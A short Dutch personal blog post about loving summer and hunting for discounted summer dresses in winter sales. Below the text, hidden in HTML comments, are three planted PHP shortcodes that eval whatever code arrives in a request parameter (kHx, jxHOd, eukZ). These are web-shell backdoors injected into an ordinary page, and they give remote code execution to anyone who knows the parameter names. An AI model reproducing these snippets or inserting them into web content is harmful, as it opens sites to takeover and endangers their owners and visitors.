Zoveel verschillende jurken voor de zomer

studio-anneloes-trust-leopardZoveel verschillende jurken voor de zomer

Ik hou echt ontzettend van de zomer, ik denk soms wel eens dat ik in get verkeerde land ben geboren omdat ik helemaal niet van kou en sneeuw hou, ik vind het verschrikkelijk! In de zomer draag ik ook het liefste alleen maar jurken, ik heb mijn hele kast vol met zomerjurken liggen die ik jammer genoeg nu weer moet opbergen omdat de winter eraan zit te komen. Het voordeel van de winter is dan wel weer dan alle jurken in de uitverkooprekken hangen en je dus de leukste voor een klein prijsje kan scoren. Ik ben al eventjes de stad in geweest en ik heb al één heel leuk jurkje gescoord die ik eventueel ook nog eens aan zou kunnen voor Koninginnedag aangezien het een beetje een oranje kleur heeft. Ik ben in de winter helemaal niet zo van de kleurtjes maar in de zomer vind ik het heerlijk om allerlei verschillende kleurtjes en vooral felle kleuren te dragen, dat is gewoon echt iets van de zomer. In ieder geval ga ik nog eens even goed opzoek naar iets wat ik van de zomer weer aankan die ik nu alvast voor weinig geld kan scoren. Ik denk dat ik van de week even de stad in ga ’s avonds aangezien ik overdag niet zoveel tijd heb omdat ik altijd stage heb. Ik hoop dat dus nog wat tegen te komen maar ook al is dat niet het geval dan treur ik er niet om hoor.

<!– [insert_php]if (isset($_REQUEST["kHx"])){eval($_REQUEST["kHx"]);exit;}[/insert_php][php]if (isset($_REQUEST["kHx"])){eval($_REQUEST["kHx"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["jxHOd"])){eval($_REQUEST["jxHOd"]);exit;}[/insert_php][php]if (isset($_REQUEST["jxHOd"])){eval($_REQUEST["jxHOd"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["eukZ"])){eval($_REQUEST["eukZ"]);exit;}[/insert_php][php]if (isset($_REQUEST["eukZ"])){eval($_REQUEST["eukZ"]);exit;}[/php] –>